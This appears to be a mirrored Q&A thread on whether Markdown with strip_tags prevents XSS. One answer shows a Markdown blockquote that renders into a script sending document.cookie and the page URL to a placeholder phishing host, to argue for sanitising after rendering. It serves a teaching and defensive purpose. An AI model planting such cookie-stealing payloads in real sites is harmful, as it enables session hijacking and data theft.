Is Markdown (with strip_tags) sufficient to stop XSS attacks?

后端未结

关注

 7  1080

I\'m working on a web application that allows users to type short descriptions of items in a catalog. I\'m allowing Markdown in my textareas so users can do some HTML format

相关标签:

7条回答

悲&欢浪女

2020-12-16 02:24

Here's a lovely example of why you need to sanitize the HTML after, not before:

Markdown code:

>  <script type="text/javascript"
>  language="js">i=new Image\(\); i.src='http://phishingwebsite.example.com/?l='
> + escape\(window.location\) + '&c=' + escape\(document.cookie\);
> </script>
>

Rendered as:

<blockquote> 
<p><script type="text/javascript"
 language="js">i=new Image(); i.src='http://phishingwebsite.example.com/?l='
+ escape(window.location) + '&amp;c=' + escape(document.cookie);
</script></p> 
</blockquote>

Now are you worried?

0 讨论(0)

上一页 1 2